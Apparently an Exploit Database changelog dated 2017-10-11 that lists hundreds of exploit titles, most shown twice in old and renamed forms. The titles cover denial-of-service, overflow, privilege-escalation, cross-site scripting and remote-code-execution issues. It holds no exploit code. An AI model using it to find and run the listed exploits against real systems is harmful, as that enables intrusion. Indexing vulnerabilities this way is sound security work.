DB: 2017-10-11
4 new exploits Hasbani-WindWeb/2.0 - HTTP GET Remote Denial of Service Hasbani-WindWeb/2.0 - GET Remote Denial of Service KingSoft - 'UpdateOcx2.dll' 'SetUninstallName()' Heap Overflow (PoC) KingSoft - 'UpdateOcx2.dll SetUninstallName()' Heap Overflow (PoC) Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service Konqueror 3.5.9 - (load) Remote Crash WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service Konqueror 3.5.9 - 'load' Remote Crash Nokia Mini Map Browser - (array sort) Silent Crash Nokia Mini Map Browser - 'Array Sort' Silent Crash vBulletin Cyb - Advanced Forum Statistics - 'misc.php' Denial of Service vBulletin Cyb - Advanced Forum Statistics 'misc.php' Denial of Service VideoLAN VLC Media Player < 1.1.4 - '.xspf' 'smb://' URI Handling Remote Stack Overflow (PoC) VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC) HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe execvp_nc' Remote Code Execution RarCrack 0.2 - 'Filename' 'init()' '.bss' (PoC) RarCrack 0.2 - 'Filename init() .bss' (PoC) VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Memory Corruption PHP 'Exif' Extension - 'exif_read_data()' Function Remote Denial of Service PHP 'Exif' Extension - 'exif_read_data()' Remote Denial of Service GNU glibc < 2.12.2 - 'fnmatch()' Function Stack Corruption GNU glibc < 2.12.2 - 'fnmatch()' Stack Corruption PyPAM - Python bindings for PAM - Double-Free Corruption PyPAM Python bindings for PAM - Double-Free Corruption Tiny Server 1.1.9 - HTTP HEAD Denial of Service Tiny Server 1.1.9 - HEAD Denial of Service Symantec End Point Protection 11.x - & Symantec Network Access Control 11.x - LCE (PoC) Symantec End Point Protection 11.x / Symantec Network Access Control 11.x - Local Code Execution (PoC) MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service MAILsweeper SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC) FL Studio 10 Producer Edition - Buffer Overflow (SEH) (PoC) Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow MyServer 0.4.3 - HTTP GET Argument Buffer Overflow MyServer 0.5 - HTTP GET Argument Buffer Overflow MyServer 0.4.3 - GET Argument Buffer Overflow MyServer 0.5 - GET Argument Buffer Overflow Cisco Aironet AP1x00 - Malformed HTTP GET Denial of Service Cisco Aironet AP1x00 - GET Denial of Service McAfee ePolicy Orchestrator 1.x/2.x/3.0 - Agent HTTP POST Buffer Mismanagement McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent - POST Buffer Mismanagement Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (1) Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (2) Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (3) Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (1) Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (2) Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (3) Gattaca Server 2003 - 'web.tmpl' 'Language' Parameter CPU Consumption (Denial of Service) Gattaca Server 2003 - 'web.tmpl Language' Parameter CPU Consumption (Denial of Service) Microsoft Windows XP - 'explorer.exe' '.tiff' Image Denial of Service Microsoft Windows XP - 'explorer.exe .tiff' Image Denial of Service PHPMailer 1.7 - 'Data()' Function Remote Denial of Service PHPMailer 1.7 - 'Data()' Remote Denial of Service Apple Mac OSX 10.x - '.zip' Parsing 'BOMStackPop()' Function Overflow Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow MailEnable 2.x - SMTP NTLM Authentication - Multiple Vulnerabilities MailEnable 2.x - SMTP NTLM Authentication Multiple Vulnerabilities Microsoft Windows Explorer - 'explorer.exe' '.WMV' File Handling Denial of Service Microsoft Windows Explorer - 'explorer.exe .WMV' File Handling Denial of Service MW6 Technologies Aztec - ActiveX 'Data Pparameter Buffer Overflow MW6 Technologies Aztec - ActiveX 'Data' Parameter Buffer Overflow Multiple BSD Distributions - 'strfmon()' Function Integer Overflow Multiple BSD Distributions - 'strfmon()' Integer Overflow HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow HP Instant Support 1.0.22 - 'HPISDataManager.dll StartApp' ActiveX Control Insecure Method HP Instant Support 1.0.22 - 'HPISDataManager.dll RegistryString' Buffer Overflow Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Function Remote Denial of Service Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Remote Denial of Service KDE Konqueror 3.5.9 - JavaScript 'load' Function Denial of Service KDE Konqueror 3.5.9 - JavaScript 'load' Denial of Service GNU glibc 2.x - 'strfmon()' Function Integer Overflow GNU glibc 2.x - 'strfmon()' Integer Overflow Sun Java System Web Server 6.1/7.0 - HTTP 'TRACE' Heap Buffer Overflow Sun Java System Web Server 6.1/7.0 - 'TRACE' Heap Buffer Overflow PHP 5.3.1 - 'session_save_path()' 'Safe_mode()' Restriction Bypass Exploiot PHP 5.3.1 - 'session_save_path() Safe_mode()' Restriction Bypass Exploiot Microsoft Windows XP/Vista - '.ani' 'tagBITMAPINFOHEADER' Denial of Service Microsoft Windows XP/Vista - '.ani tagBITMAPINFOHEADER' Denial of Service PHP 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service PHP 5.3.2 - 'zend_strtod()' Floating-Point Value Denial of Service PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Function Denial of Service PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Function Plaintext Data Memory Leak Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Function Ciphertext Data Memory Leak Denial of Service Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Denial of Service PHP 5.3.x 'Zip' Extension - 'stream_get_contents()' Denial of Service PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC) Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC) Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC) Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey - Crash (PoC) Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection Crash (PoC) Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName Crash (PoC) Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW Crash (PoC) Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey Crash (PoC) CoDeSys 3.4 - HTTP POST Null Pointer Content-Length Parsing Remote Denial of Service CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to - Malformed FDSelect Offset in the CFF Table Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to - Malformed Name INDEX in the CFF Table Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to - Malformed CFF Table Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to Malformed CFF Table Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access BT Home Hub - 'uuid' field Buffer Overflow BT Home Hub - 'uuid' Buffer Overflow Squid - 'httpMakeVaryMark()' Function Remote Denial of Service Squid - 'httpMakeVaryMark()' Remote Denial of Service Python 3.3 < 3.5 - 'product_setstate()' Function Out-of-Bounds Read Python 3.3 < 3.5 - 'product_setstate()' Out-of-Bounds Read Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117) Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) Pool Buffer Overflow (MS15-117) Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame Broadcom Wi-Fi SoC - Heap Overflow 'wlc_tdls_cal_mic_chk' Due to Large RSN IE in TDLS Setup Confirm Frame Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel - win32k.sys '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit) ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation SGI IRIX 6.5.28 - (runpriv) Design Error SGI IRIX 6.5.28 - 'runpriv' Design Error PHP < 4.4.5/5.2.1 - 'shmop' Functions Local Code Execution PHP < 4.4.5/5.2.1 - 'shmop' Local Code Execution PHP < 4.4.5/5.2.1 - '_SESSION' 'unset()' Local Exploit PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Exploit FreeBSD 6.4 - pipeclose()/knlist_cleardel() Race Condition FreeBSD 7.2 VFS/devfs - Race Condition FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition FreeBSD 7.2 - VFS/devfs Race Condition Microsoft Windows 7 - 'wab32res.dll' 'wab.exe' DLL Hijacking Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking Oracle 10/11g - 'exp.exe' 'file' Parameter Local Buffer Overflow (PoC) Oracle 10/11g - 'exp.exe file' Parameter Local Buffer Overflow (PoC) Microsoft Visio - 'VISIODWG.dll' '.DXF' File Handling (MS10-028) (Metasploit) Microsoft Visio - 'VISIODWG.dll .DXF' File Handling (MS10-028) (Metasploit) ACDSee FotoSlate - '.PLP' File id Parameter Overflow (Metasploit) ACDSee FotoSlate - '.PLP' File 'id' Parameter Overflow (Metasploit) Netscape iCal 2.1 Patch2 iPlanet iCal - 'iplncal.sh' Permissions Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions PLIB 1.8.5 - ssg/ssgParser.cxx Buffer Overflow PLIB 1.8.5 - 'ssg/ssgParser.cxx' Buffer Overflow Linux PAM 0.77 - Pam_Wheel Module 'getlogin()' 'Username' Spoofing Privilege Escalation Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation Microsoft ListBox/ComboBox Control - 'User32.dll' Function Buffer Overrun Microsoft ListBox/ComboBox Control - 'User32.dll' Buffer Overrun PHP 4.x/5.0/5.1 - 'mb_send_mail()' Function Parameter Restriction Bypass PHP 4.x/5.0/5.1 - 'mb_send_mail()' Parameter Restriction Bypass Microsoft Windows - 'ndproxy.sys' - Privilege Escalation (Metasploit) Microsoft Windows - 'ndproxy.sys' Privilege Escalation (Metasploit) Microsoft Windows - SeImpersonatePrivilege - Privilege Escalation Microsoft Windows - 'SeImpersonatePrivilege' Privilege Escalation Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1) Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1) Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure MASM321 11 Quick Editor - '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass) MASM321 11 Quick Editor '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass) CompuSource Systems - Real Time Home Banking - Privilege Escalation CompuSource Systems Real Time Home Banking - Privilege Escalation Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (SUID Method) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) OpenBSD - 'at' 'Stack Clash' Local Privilege Escalation Linux Kernel - 'offset2lib' 'Stack Clash' Exploit Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation OpenBSD - 'at Stack Clash' Local Privilege Escalation Linux Kernel - 'offset2lib Stack Clash' Exploit Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation Microsoft Windows - LNK Shortcut File Code Execution (Metasploit) Microsoft Windows - '.LNK' Shortcut File Code Execution (Metasploit) Microsoft Windows 10 x64 RS2 - 'win32kfull!bFill' Pool Overflow Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass) Xine-Lib 1.1 - (media player library) Remote Format String CA iTechnology iGateway - (debug mode) Remote Buffer Overflow Xine-Lib 1.1 - 'Media Player Library' Remote Format String CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python) Microsoft Windows - 'NetpManageIPCConnect' Stack Overflow (MS06-070) (Python) Microsoft Windows - DNS RPC - Remote Buffer Overflow (2) Microsoft Windows - DNS RPC Remote Buffer Overflow (2) 3proxy 0.5.3g (Linux) - 'proxy.c' 'logurl()' Remote Buffer Overflow 3proxy 0.5.3g (Windows x86) - 'proxy.c' 'logurl()' Remote Buffer Overflow 3proxy 0.5.3g - (exec-shield) 'proxy.c' 'logurl()' Remote Overflow 3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow 3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow 3proxy 0.5.3g - (exec-shield) 'proxy.c logurl()' Remote Overflow NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()/ Insecure Method NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()'/ Insecure Method CHILKAT ASP String - 'CkString.dll 1.1' 'SaveToFile()' Insecure Method CHILKAT ASP String - 'CkString.dll 1.1 SaveToFile()' Insecure Method GlobalLink 2.7.0.8 - 'glItemCom.dll' 'SetInfo()' Heap Overflow GlobalLink 2.7.0.8 - 'glItemCom.dll SetInfo()' Heap Overflow GlobalLink 2.7.0.8 - 'glitemflat.dll' 'SetClientInfo()' Heap Overflow Ultra Crypto Component - 'CryptoX.dll 2.0' 'SaveToFile()' Insecure Method GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow Ultra Crypto Component - 'CryptoX.dll 2.0 SaveToFile()' Insecure Method Microsoft Visual FoxPro 6.0 - FPOLE.OCX Arbitrary Command Execution Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution WebKit - 'Document()' Function Remote Information Disclosure WebKit - 'Document()' Remote Information Disclosure Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution Microsoft Internet Explorer 6/7/8 - 'winhlp32.exe MsgBox()' Remote Code Execution Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' 'OpenFile()' Remote Overflow Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll OpenFile()' Remote Overflow Bigant Messenger 2.52 - 'AntCore.dll' 'RegisterCom()' Remote Heap Overflow Bigant Messenger 2.52 - 'AntCore.dll RegisterCom()' Remote Heap Overflow Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass httpdx - 'tolog()' Function Format String (Metasploit) (1) httpdx - 'tolog()' Format String (Metasploit) (1) httpdx - 'tolog()' Function Format String (Metasploit) (2) httpdx - 'tolog()' Format String (Metasploit) (2) httpdx - 'h_handlepeer()' Function Buffer Overflow (Metasploit) httpdx - 'h_handlepeer()' Buffer Overflow (Metasploit) hplip - hpssd.py From Address Arbitrary Command Execution (Metasploit) hplip - 'hpssd.py' From Address Arbitrary Command Execution (Metasploit) Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit) Apple Mac OSX EvoCam Web Server - GET Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'OvJavaLocale' Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe' 'execvp' Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe OvJavaLocale' Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI 'webappmon.exe execvp' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe' 'schdParams' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'nnmRptConfig.exe schdParams' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'ICount' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'main' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe ICount' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe main' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe' 'ovutil' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' 'Hostname' CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'ovwebsnmpsrv.exe ovutil' Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe Hostname' CGI Buffer Overflow (Metasploit) ZyWALL USG - Appliance - Multiple Vulnerabilities ZyWALL USG Appliance - Multiple Vulnerabilities ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2) ScriptFTP 3.3 - LIST Remote Buffer Overflow (Metasploit) (2) Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit) Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit) Adobe Flash Player - '.mp4' 'cprt' Overflow (Metasploit) Adobe Flash Player - '.mp4 cprt' Overflow (Metasploit) UoW Pine 4.0.4/4.10/4.21 - 'From:' Field Buffer Overflow UoW Pine 4.0.4/4.10/4.21 - 'From:' Buffer Overflow Technote 2000/2001 - 'board' Function File Disclosure Technote 2000/2001 - 'board' File Disclosure IPSwitch IMail 6.x/7.0/7.1 - Web Messaging HTTP Get Buffer Overflow IPSwitch IMail 6.x/7.0/7.1 - Web Messaging GET Buffer Overflow Novell NetWare 5.1/6.0 - HTTP Post Arbitrary Perl Code Execution Novell NetWare 5.1/6.0 - POST Arbitrary Perl Code Execution Webmin 0.x - 'RPC' Function Privilege Escalation Webmin 0.x - 'RPC' Privilege Escalation Avaya IP Office Customer Call Reporter - ImageUpload.ashx Remote Command Execution (Metasploit) Avaya IP Office Customer Call Reporter - 'ImageUpload.ashx' Remote Command Execution (Metasploit) ghttpd 1.4.x - 'Log()' Function Buffer Overflow ghttpd 1.4.x - 'Log()' Buffer Overflow M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - 'nph-psf.exe css' Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - 'nph-psa.exe css' Parameter Cross-Site Scripting Dune 0.6.7 - HTTP Get Remote Buffer Overrun Dune 0.6.7 - GET Remote Buffer Overrun InduSoft Web Studio - 'ISSymbol.ocx' 'InternationalSeparator()' Heap Overflow (Metasploit) InduSoft Web Studio - 'ISSymbol.ocx InternationalSeparator()' Heap Overflow (Metasploit) GNU Anubis 3.6.x/3.9.x - 'auth.c' 'auth_ident()' Function Overflow GNU Anubis 3.6.x/3.9.x - 'auth.c auth_ident()' Overflow Rlpr 2.0 - 'msg()' Function Multiple Vulnerabilities Rlpr 2.0 - 'msg()' Multiple Vulnerabilities Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept' 'p_t02' Parameter Cross-Site Scripting Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept p_t02' Parameter Cross-Site Scripting SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp' 'fullName' Parameter Arbitrary File Disclosure SAP Business Connector 4.6/4.7 - 'deleteSingle' 'fullName' Parameter Arbitrary File Deletion SAP Business Connector 4.6/4.7 - 'adapter-index.dsp' 'url' Parameter Arbitrary Site Redirect SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp fullName' Parameter Arbitrary File Disclosure SAP Business Connector 4.6/4.7 - 'deleteSingle fullName' Parameter Arbitrary File Deletion SAP Business Connector 4.6/4.7 - 'adapter-index.dsp url' Parameter Arbitrary Site Redirect PHP 4.x - 'tempnam()' Function open_basedir Restriction Bypass PHP 4.x - 'copy()' Function 'Safe_Mode' Bypass Exploit PHP 4.x - 'tempnam() open_basedir' Restriction Bypass PHP 4.x - 'copy() Safe_Mode' Bypass Exploit Python 2.5 - 'PyLocale_strxfrm' Function Remote Information Leak Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak aBitWhizzy - 'whizzypic.php' 'd' ParameterTraversal Arbitrary Directory Listing aBitWhizzy - 'whizzypic.php d' ParameterTraversal Arbitrary Directory Listing PHP 5.1.6 - 'Chunk_Split()' Function Integer Overflow PHP 5.1.6 - 'Chunk_Split()' Integer Overflow PHP 5.1.6 - 'Imap_Mail_Compose()' Function Buffer Overflow PHP 5.1.6 - 'Imap_Mail_Compose()' Buffer Overflow Cisco IOS 12.3 - LPD Remote Buffer Overflow Cisco IOS 12.3 - 'LPD' Remote Buffer Overflow Ghostscript 8.0.1/8.15 - 'zseticcspace()' Function Buffer Overflow Ghostscript 8.0.1/8.15 - 'zseticcspace()' Buffer Overflow HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow HP Instant Support 1.0.22 - 'HPISDataManager.dll ExtractCab' ActiveX Control Buffer Overflow F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php' 'css_exceptions' Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php' 'sql_matchscope' Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php css_exceptions' Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php sql_matchscope' Parameter Cross-Site Scripting Audio File Library 0.2.6 - libaudiofile 'msadpcm.c' '.WAV' File Processing Buffer Overflow Audio File Library 0.2.6 - libaudiofile 'msadpcm.c .WAV' File Processing Buffer Overflow ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection ProFTPd 1.3 - 'mod_sql Username' SQL Injection Microsoft Windows Vista - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution Microsoft Windows Vista - 'lpksetup.exe oci.dll' DLL Loading Arbitrary Code Execution PHP 5.3.x - 'mb_strcut()' Function Information Disclosure PHP 5.3.x - 'mb_strcut()' Information Disclosure Perl 5.x - 'lc()' and 'uc()' functions TAINT Mode Protection Security Bypass Perl 5.x - 'lc()' / 'uc()' TAINT Mode Protection Security Bypass Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf' 'jdeowpBackButtonProtect' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService' 'e1.namespace' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService' 'e1.namespace' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService' 'RENDER_MAFLET' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService' 'jdemafjasLinkTarget' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf jdeowpBackButtonProtect' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService e1.namespace' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService e1.namespace' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService RENDER_MAFLET' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget' Parameter Cross-Site Scripting NetBSD 5.1 - Multiple 'libc/net' functions Stack Buffer Overflow NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflow Skype 5.3 - 'Mobile Phone' Field HTML Injection Skype 5.3 - 'Mobile Phone' HTML Injection IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Remote Stack Buffer Overflow GoAhead Web Server 2.18 - 'addgroup.asp' 'group' Parameter Cross-Site Scripting GoAhead Web Server 2.18 - 'addlimit.asp' 'url' Parameter Cross-Site Scripting GoAhead Web Server 2.18 - 'addgroup.asp group' Parameter Cross-Site Scripting GoAhead Web Server 2.18 - 'addlimit.asp url' Parameter Cross-Site Scripting Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi ping_ipaddr' Parameter Remote Code Execution VideoCharge Studio - 